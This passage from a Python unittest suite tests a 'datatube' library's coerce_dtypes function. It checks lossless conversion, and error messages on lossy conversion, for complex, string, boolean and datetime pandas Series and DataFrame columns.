in_data = self.bool_flags + [None]
out_data = [bool(c.real) for c in self.bool_flags] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_real_complex_to_boolean_no_na(self):
in_data = self.real_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_to_boolean_with_na(self):
in_data = self.real_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_whole_complex_to_boolean_no_na(self):
in_data = self.real_whole_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_whole_complex_to_boolean_with_na(self):
in_data = self.real_whole_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_between_0_and_1_to_boolean_no_na(self):
in_data = self.real_complex_between_0_and_1
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_between_0_and_1_to_boolean_with_na(self):
in_data = self.real_complex_between_0_and_1 + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_boolean_no_na(self):
in_data = self.imag_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_boolean_with_na(self):
in_data = self.imag_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_to_datetime_no_na(self):
in_data = self.real_complex
out_data = [datetime.fromtimestamp(c.real, tz=timezone.utc)
for c in self.real_complex]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_real_complex_to_datetime_with_na(self):
in_data = self.real_complex + [None]
out_data = [datetime.fromtimestamp(c.real, tz=timezone.utc)
for c in self.real_complex] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_imaginary_complex_to_datetime_no_na(self):
in_data = self.imag_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {datetime} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, datetime)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {datetime} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: datetime})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_datetime_with_na(self):
in_data = self.imag_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {datetime} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, datetime)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {datetime} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: datetime})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_to_timedelta_no_na(self):
in_data = self.real_complex
out_data = [timedelta(seconds=c.real) for c in self.real_complex]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_real_complex_to_timedelta_with_na(self):
in_data = self.real_complex + [None]
out_data = ([timedelta(seconds=c.real) for c in self.real_complex] +
[None])
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_imaginary_complex_to_timedelta_no_na(self):
    """Complex values with nonzero imaginary parts must refuse timedelta
    coercion: the imaginary component would be lost.
    """
    values = self.imag_complex
    # series
    series = pd.Series(values)
    expected = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
                f"values to {timedelta} without losing information (head: "
                f"{list(series.head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(series, timedelta)
    self.assertEqual(str(ctx.exception), expected)
    # dataframe
    frame = pd.DataFrame({self.col_name: values})
    expected = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
                f"{repr(self.col_name)} to {timedelta} without losing "
                f"information (head: {list(frame[self.col_name].head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(frame, {self.col_name: timedelta})
    self.assertEqual(str(ctx.exception), expected)
def test_coerce_from_imaginary_complex_to_timedelta_with_na(self):
    """Imaginary complex values reject timedelta coercion even when
    missing values are present in the data.
    """
    values = self.imag_complex + [None]
    # series
    series = pd.Series(values)
    expected = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
                f"values to {timedelta} without losing information (head: "
                f"{list(series.head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(series, timedelta)
    self.assertEqual(str(ctx.exception), expected)
    # dataframe
    frame = pd.DataFrame({self.col_name: values})
    expected = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
                f"{repr(self.col_name)} to {timedelta} without losing "
                f"information (head: {list(frame[self.col_name].head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(frame, {self.col_name: timedelta})
    self.assertEqual(str(ctx.exception), expected)
def test_coerce_from_complex_to_object_no_na(self):
    """Any complex series coerces freely to object dtype; values survive
    untouched, only the dtype changes.
    """
    source = pd.Series(self.imag_complex)
    expected = source.astype(np.dtype("O"))
    # series
    assert_series_equal(coerce_dtypes(source, object), expected)
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: object}),
        pd.DataFrame({self.col_name: expected}))
# NOTE(review): "wth" in the method name is a typo for "with"; kept as-is
# so the discovered test name does not change.
def test_coerce_from_complex_to_object_wth_na(self):
    """Complex data containing a missing value also coerces freely to
    object dtype.
    """
    source = pd.Series(self.imag_complex + [None])
    expected = source.astype(np.dtype("O"))
    # series
    assert_series_equal(coerce_dtypes(source, object), expected)
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: object}),
        pd.DataFrame({self.col_name: expected}))
class CoerceStringDtypeTests(unittest.TestCase):
    """Test coercion of string series/dataframe columns to every dtype
    recognized by ``coerce_dtypes``.

    Fixtures are string representations of each target type, so every
    conversion in this suite is expected to be lossless.  The mixed
    aware/naive and mixed-timezone datetime cases are unimplemented stubs
    that raise ``NotImplementedError``.
    """

    @classmethod
    def setUpClass(cls) -> None:
        # Seed the RNG so the float fixtures (and everything derived from
        # them) are reproducible.  Generation order below matters: each
        # random.random() call consumes seeded state.
        random.seed(12345)
        size = 3
        cls.integers = [-1 * size // 2 + i + 1 for i in range(size)]
        # ^ = [..., -1, 0, 1, ...]
        cls.floats = [i + random.random() for i in cls.integers]
        # ^ = [..., -1+e, 0+e, 1+e, ...] with e in [0, 1)
        cls.complex = [complex(f, f) for f in cls.floats]
        # ^ = [..., complex(-1+e,-1+e), complex(0+e,0+e), ...]
        cls.characters = [chr((i % 26) + ord("a")) for i in range(size)]
        # ^ = ["a", "b", "c", ..., cycling through the alphabet]
        cls.booleans = [bool((i + 1) % 2) for i in range(size)]
        # ^ = [True, False, True, ...]
        cls.naive_datetimes = [datetime.utcfromtimestamp(f) for f in cls.floats]
        # ^ = UTC wall-clock datetimes with no tzinfo attached
        cls.aware_datetimes = [datetime.fromtimestamp(f, tz=timezone.utc)
                               for f in cls.floats]
        # ^ = the same instants, with explicit UTC tzinfo
        cls.aware_naive_datetimes = []
        for index, f in enumerate(cls.floats):
            if index % 2:  # naive
                cls.aware_naive_datetimes.append(datetime.utcfromtimestamp(f))
            else:  # aware
                val = datetime.fromtimestamp(f, tz=timezone.utc)
                cls.aware_naive_datetimes.append(val)
        # ^ = [aware, naive, aware, naive, ...]
        cls.mixed_timezones = []
        for index, f in enumerate(cls.floats):
            tz_name = pytz.all_timezones[index % len(pytz.all_timezones)]
            tz = pytz.timezone(tz_name)
            cls.mixed_timezones.append(datetime.fromtimestamp(f, tz=tz))
        # ^ = one datetime per pytz timezone, cycling alphabetically
        cls.timedeltas = [timedelta(seconds=f) for f in cls.floats]
        # ^ = [..., -1+e seconds, 0+e seconds, 1+e seconds, ...]
        cls.col_name = "strings"

    def _assert_coerced(self, in_data, out_data, target):
        """Coerce ``in_data`` to ``target`` both as a Series and as a
        single-column DataFrame, asserting the result equals ``out_data``.
        """
        # series
        result = coerce_dtypes(pd.Series(in_data), target)
        assert_series_equal(result, pd.Series(out_data))
        # dataframe
        result = coerce_dtypes(pd.DataFrame({self.col_name: in_data}),
                               {self.col_name: target})
        assert_frame_equal(result, pd.DataFrame({self.col_name: out_data}))

    def _assert_coerced_to_object(self, in_series):
        """Coerce ``in_series`` to object dtype both as a Series and as a
        single-column DataFrame; only the dtype should change.
        """
        out_series = in_series.astype(np.dtype("O"))
        # series
        assert_series_equal(coerce_dtypes(in_series, object), out_series)
        # dataframe
        result = coerce_dtypes(pd.DataFrame({self.col_name: in_series}),
                               {self.col_name: object})
        assert_frame_equal(result, pd.DataFrame({self.col_name: out_series}))

    def test_coerce_from_integer_string_to_integer_no_na(self):
        self._assert_coerced([str(i) for i in self.integers],
                             self.integers, int)

    def test_coerce_from_integer_string_to_integer_with_na(self):
        self._assert_coerced([str(i) for i in self.integers] + [None],
                             self.integers + [None], int)

    def test_coerce_from_float_string_to_float_no_na(self):
        self._assert_coerced([str(f) for f in self.floats],
                             self.floats, float)

    def test_coerce_from_float_string_to_float_with_na(self):
        self._assert_coerced([str(f) for f in self.floats] + [None],
                             self.floats + [None], float)

    def test_coerce_from_complex_string_to_complex_no_na(self):
        self._assert_coerced([str(c) for c in self.complex],
                             self.complex, complex)

    def test_coerce_from_complex_string_to_complex_with_na(self):
        self._assert_coerced([str(c) for c in self.complex] + [None],
                             self.complex + [None], complex)

    def test_coerce_from_character_string_to_string_no_na(self):
        self._assert_coerced(self.characters, self.characters.copy(), str)

    def test_coerce_from_character_string_to_string_with_na(self):
        in_data = self.characters + [None]
        self._assert_coerced(in_data, in_data.copy(), str)

    def test_coerce_from_boolean_string_to_boolean_no_na(self):
        self._assert_coerced([str(b) for b in self.booleans],
                             self.booleans, bool)

    def test_coerce_from_boolean_string_to_boolean_with_na(self):
        self._assert_coerced([str(b) for b in self.booleans] + [None],
                             self.booleans + [None], bool)

    def test_coerce_from_naive_datetime_string_to_datetime_no_na(self):
        self._assert_coerced([str(d) for d in self.naive_datetimes],
                             self.naive_datetimes, datetime)

    def test_coerce_from_naive_datetime_string_to_datetime_with_na(self):
        self._assert_coerced([str(d) for d in self.naive_datetimes] + [None],
                             self.naive_datetimes + [None], datetime)

    def test_coerce_from_naive_ISO_8601_string_to_datetime_no_na(self):
        self._assert_coerced([d.isoformat() for d in self.naive_datetimes],
                             self.naive_datetimes, datetime)

    def test_coerce_from_naive_ISO_8601_string_to_datetime_with_na(self):
        self._assert_coerced(
            [d.isoformat() for d in self.naive_datetimes] + [None],
            self.naive_datetimes + [None], datetime)

    def test_coerce_from_aware_datetime_string_to_datetime_no_na(self):
        self._assert_coerced([str(d) for d in self.aware_datetimes],
                             self.aware_datetimes, datetime)

    def test_coerce_from_aware_datetime_string_to_datetime_with_na(self):
        self._assert_coerced([str(d) for d in self.aware_datetimes] + [None],
                             self.aware_datetimes + [None], datetime)

    def test_coerce_from_aware_ISO_8601_string_to_datetime_no_na(self):
        self._assert_coerced([d.isoformat() for d in self.aware_datetimes],
                             self.aware_datetimes, datetime)

    def test_coerce_from_aware_ISO_8601_string_to_datetime_with_na(self):
        self._assert_coerced(
            [d.isoformat() for d in self.aware_datetimes] + [None],
            self.aware_datetimes + [None], datetime)

    # The mixed aware/naive and mixed-timezone cases below are deliberate
    # placeholders: they raise so the suite reports them instead of
    # silently passing.

    def test_coerce_from_aware_naive_datetime_string_to_datetime_no_na(self):
        raise NotImplementedError()

    def test_coerce_from_aware_naive_datetime_string_to_datetime_with_na(self):
        raise NotImplementedError()

    def test_coerce_from_aware_naive_ISO_8601_string_to_datetime_no_na(self):
        raise NotImplementedError()

    def test_coerce_from_aware_naive_ISO_8601_string_to_datetime_with_na(self):
        raise NotImplementedError()

    def test_coerce_from_mixed_tz_datetime_string_to_datetime_no_na(self):
        raise NotImplementedError()

    def test_coerce_from_mixed_tz_datetime_string_to_datetime_with_na(self):
        raise NotImplementedError()

    def test_coerce_from_mixed_tz_ISO_8601_string_to_datetime_no_na(self):
        raise NotImplementedError()

    def test_coerce_from_mixed_tz_ISO_8601_string_to_datetime_with_na(self):
        raise NotImplementedError()

    def test_coerce_from_timedelta_string_to_timedelta_no_na(self):
        self._assert_coerced([str(t) for t in self.timedeltas],
                             self.timedeltas, timedelta)

    def test_coerce_from_timedelta_string_to_timedelta_with_na(self):
        self._assert_coerced([str(t) for t in self.timedeltas] + [None],
                             self.timedeltas + [None], timedelta)

    def test_coerce_from_string_to_object_no_na(self):
        self._assert_coerced_to_object(pd.Series(self.timedeltas))

    def test_coerce_from_string_to_object_with_na(self):
        self._assert_coerced_to_object(pd.Series(self.timedeltas + [None]))
class CoerceBooleanDtypeTests(unittest.TestCase):
    """Test coercion of boolean series/dataframe columns to every dtype
    recognized by ``coerce_dtypes``.

    Booleans convert losslessly to every target dtype (int/float/complex
    0 or 1, string "True"/"False", epoch-second datetimes/timedeltas).
    """

    @classmethod
    def setUpClass(cls) -> None:
        size = 3
        cls.booleans = [bool((i + 1) % 2) for i in range(size)]
        # ^ = [True, False, True, False, ...]
        cls.col_name = "booleans"

    def _assert_coerced(self, in_data, out_data, target):
        """Coerce ``in_data`` to ``target`` both as a Series and as a
        single-column DataFrame, asserting the result equals ``out_data``.
        """
        # series
        result = coerce_dtypes(pd.Series(in_data), target)
        assert_series_equal(result, pd.Series(out_data))
        # dataframe
        result = coerce_dtypes(pd.DataFrame({self.col_name: in_data}),
                               {self.col_name: target})
        assert_frame_equal(result, pd.DataFrame({self.col_name: out_data}))

    def test_coerce_from_boolean_to_integer_no_na(self):
        self._assert_coerced(self.booleans,
                             [int(b) for b in self.booleans], int)

    def test_coerce_from_boolean_to_integer_with_na(self):
        self._assert_coerced(self.booleans + [None],
                             [int(b) for b in self.booleans] + [None], int)

    def test_coerce_from_boolean_to_float_no_na(self):
        self._assert_coerced(self.booleans,
                             [float(b) for b in self.booleans], float)

    def test_coerce_from_boolean_to_float_with_na(self):
        self._assert_coerced(self.booleans + [None],
                             [float(b) for b in self.booleans] + [None],
                             float)

    def test_coerce_from_boolean_to_complex_no_na(self):
        self._assert_coerced(self.booleans,
                             [complex(b, 0) for b in self.booleans], complex)

    def test_coerce_from_boolean_to_complex_with_na(self):
        self._assert_coerced(self.booleans + [None],
                             [complex(b, 0) for b in self.booleans] + [None],
                             complex)

    def test_coerce_from_boolean_to_string_no_na(self):
        self._assert_coerced(self.booleans,
                             [str(b) for b in self.booleans], str)

    def test_coerce_from_boolean_to_string_with_na(self):
        self._assert_coerced(self.booleans + [None],
                             [str(b) for b in self.booleans] + [None], str)

    def test_coerce_from_boolean_to_boolean_no_na(self):
        # identity coercion: values pass through unchanged
        self._assert_coerced(self.booleans, self.booleans.copy(), bool)

    def test_coerce_from_boolean_to_boolean_with_na(self):
        in_data = self.booleans + [None]
        self._assert_coerced(in_data, in_data.copy(), bool)

    def test_coerce_from_boolean_to_datetime_no_na(self):
        out_data = [datetime.fromtimestamp(b, tz=timezone.utc)
                    for b in self.booleans]
        self._assert_coerced(self.booleans, out_data, datetime)

    def test_coerce_from_boolean_to_datetime_with_na(self):
        out_data = [datetime.fromtimestamp(b, tz=timezone.utc)
                    for b in self.booleans] + [None]
        self._assert_coerced(self.booleans + [None], out_data, datetime)

    def test_coerce_from_boolean_to_timedelta_no_na(self):
        self._assert_coerced(self.booleans,
                             [timedelta(seconds=b) for b in self.booleans],
                             timedelta)

    def test_coerce_from_boolean_to_timedelta_with_na(self):
        out_data = [timedelta(seconds=b) for b in self.booleans] + [None]
        self._assert_coerced(self.booleans + [None], out_data, timedelta)

    def test_coerce_from_boolean_to_object_no_na(self):
        in_series = pd.Series(self.booleans)
        out_series = in_series.astype(np.dtype("O"))
        # series
        assert_series_equal(coerce_dtypes(in_series, object), out_series)
        # dataframe -- compare against the object-typed expectation.  The
        # original built out_df from in_series (bool dtype), which could
        # never equal an object-dtype result under assert_frame_equal's
        # default dtype check; fixed to match the pattern used by the
        # other Coerce*DtypeTests classes.
        in_df = pd.DataFrame({self.col_name: in_series})
        out_df = pd.DataFrame({self.col_name: out_series})
        assert_frame_equal(coerce_dtypes(in_df, {self.col_name: object}),
                           out_df)

    def test_coerce_from_boolean_to_object_with_na(self):
        in_series = pd.Series(self.booleans + [None])
        out_series = in_series.astype(np.dtype("O"))
        # series
        assert_series_equal(coerce_dtypes(in_series, object), out_series)
        # dataframe -- use the object-typed expectation (see the no_na
        # variant above); with a None present both dtypes are already
        # object, but the explicit expectation keeps the test honest.
        in_df = pd.DataFrame({self.col_name: in_series})
        out_df = pd.DataFrame({self.col_name: out_series})
        assert_frame_equal(coerce_dtypes(in_df, {self.col_name: object}),
                           out_df)
class CoerceDatetimeDtypeTests(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
    """Build shared datetime fixtures once for the whole class.

    NOTE(review): fixture generation order is significant -- each
    ``random.random()`` call consumes seeded RNG state, so reordering
    any line below changes every downstream fixture value.
    """
    random.seed(12345)  # reproducible fixtures across runs
    size = 3
    # integers = [..., -1, 0, 1, ...]; floats = integers + e, e in [0, 1)
    integers = [-1 * size // 2 + i + 1 for i in range(size)]
    floats = [i + random.random() for i in integers]
    # datetimes on exact second boundaries (losslessly int-convertible)
    cls.whole_datetimes = [datetime.fromtimestamp(i, tz=timezone.utc)
                           for i in integers]
    # ^ = [..., utc time -1, utc time 0, utc time 1, ...]
    # timestamps strictly inside (0, 1): truthy-but-not-1 edge cases
    cls.datetimes_between_0_and_1 = [datetime.fromtimestamp(random.random(),
                                                            tz=timezone.utc)
                                     for _ in range(size)]
    # ^ = [utc time 0+e, utc time 0+e, utc time 0+e, ...]
    # timestamps that are exactly 0 or 1 (valid boolean flags)
    cls.bool_flags = [datetime.fromtimestamp((i + 1) % 2, tz=timezone.utc)
                      for i in range(size)]
    # ^ = [utc time 1, utc time 0, utc time 1, utc time 0, ...]
    cls.naive_datetimes = [datetime.utcfromtimestamp(f) for f in floats]
    # ^ = [..., utc time -1+e, utc time 0+e, utc time 1+e, ...] (no tz)
    cls.aware_datetimes = [datetime.fromtimestamp(f, tz=timezone.utc)
                           for f in floats]
    # ^ = [..., utc time -1+e, utc time 0+e, utc_time 1+e, ...] (with tz)
    # alternating timezone-aware / naive values
    cls.aware_naive_datetimes = []
    for index, f in enumerate(floats):
        if index % 2:  # naive
            cls.aware_naive_datetimes.append(datetime.utcfromtimestamp(f))
        else:  # aware
            val = datetime.fromtimestamp(f, tz=timezone.utc)
            cls.aware_naive_datetimes.append(val)
    # ^ = [aware, naive, aware, naive, aware, ...]
    # one datetime per pytz timezone, cycling alphabetically
    cls.mixed_timezones = []
    for index, f in enumerate(floats):
        tz_name = pytz.all_timezones[index % len(pytz.all_timezones)]
        tz = pytz.timezone(tz_name)
        val = datetime.fromtimestamp(f, tz=tz)
        cls.mixed_timezones.append(val)
    # ^ = ["Africa/Abidjan", "Africa/Accra", "Africa/Addis_Ababa", ...]
    cls.col_name = "datetimes"
def test_coerce_from_whole_datetime_to_integer_no_na(self):
    """Datetimes on exact second boundaries convert losslessly to ints
    (their epoch-second timestamps).
    """
    source = self.whole_datetimes
    expected = [int(d.timestamp()) for d in self.whole_datetimes]
    # series
    assert_series_equal(coerce_dtypes(pd.Series(source), int),
                        pd.Series(expected))
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: int}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_whole_datetime_to_integer_with_na(self):
    """Whole-second datetimes plus a missing value still coerce to int;
    the NA entry passes through unchanged.
    """
    source = self.whole_datetimes + [None]
    expected = [int(d.timestamp()) for d in self.whole_datetimes] + [None]
    # series
    assert_series_equal(coerce_dtypes(pd.Series(source), int),
                        pd.Series(expected))
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: int}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_random_datetime_to_integer_no_na(self):
    """Datetimes with fractional seconds must refuse int coercion: the
    sub-second component would be lost.
    """
    values = self.aware_datetimes
    # series
    series = pd.Series(values)
    expected = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
                f"values to {int} without losing information (head: "
                f"{list(series.head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(series, int)
    self.assertEqual(str(ctx.exception), expected)
    # dataframe
    frame = pd.DataFrame({self.col_name: values})
    expected = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
                f"{repr(self.col_name)} to {int} without losing "
                f"information (head: {list(frame[self.col_name].head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(frame, {self.col_name: int})
    self.assertEqual(str(ctx.exception), expected)
def test_coerce_from_random_datetime_to_integer_with_na(self):
    """Fractional-second datetimes reject int coercion even when missing
    values are present.
    """
    values = self.aware_datetimes + [None]
    # series
    series = pd.Series(values)
    expected = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
                f"values to {int} without losing information (head: "
                f"{list(series.head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(series, int)
    self.assertEqual(str(ctx.exception), expected)
    # dataframe
    frame = pd.DataFrame({self.col_name: values})
    expected = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
                f"{repr(self.col_name)} to {int} without losing "
                f"information (head: {list(frame[self.col_name].head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(frame, {self.col_name: int})
    self.assertEqual(str(ctx.exception), expected)
def test_coerce_datetime_to_float_no_na(self):
    """Arbitrary datetimes coerce losslessly to float epoch timestamps."""
    source = self.aware_datetimes
    expected = [d.timestamp() for d in self.aware_datetimes]
    # series
    assert_series_equal(coerce_dtypes(pd.Series(source), float),
                        pd.Series(expected))
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: float}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_datetime_to_float_with_na(self):
    """Datetimes plus a missing value coerce to float timestamps; the
    NA entry is carried through unchanged.
    """
    source = self.aware_datetimes + [None]
    expected = [d.timestamp() for d in self.aware_datetimes] + [None]
    # series
    assert_series_equal(coerce_dtypes(pd.Series(source), float),
                        pd.Series(expected))
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: float}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_datetime_to_complex_no_na(self):
    """Datetimes coerce to complex numbers whose real part is the epoch
    timestamp and whose imaginary part is zero.
    """
    source = self.aware_datetimes
    expected = [complex(d.timestamp(), 0) for d in self.aware_datetimes]
    # series
    assert_series_equal(coerce_dtypes(pd.Series(source), complex),
                        pd.Series(expected))
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: complex}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_datetime_to_complex_with_na(self):
    """Datetimes plus a missing value coerce to complex timestamps; the
    NA entry is carried through unchanged.
    """
    source = self.aware_datetimes + [None]
    expected = ([complex(d.timestamp(), 0) for d in self.aware_datetimes]
                + [None])
    # series
    assert_series_equal(coerce_dtypes(pd.Series(source), complex),
                        pd.Series(expected))
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: complex}),
        pd.DataFrame({self.col_name: expected}))
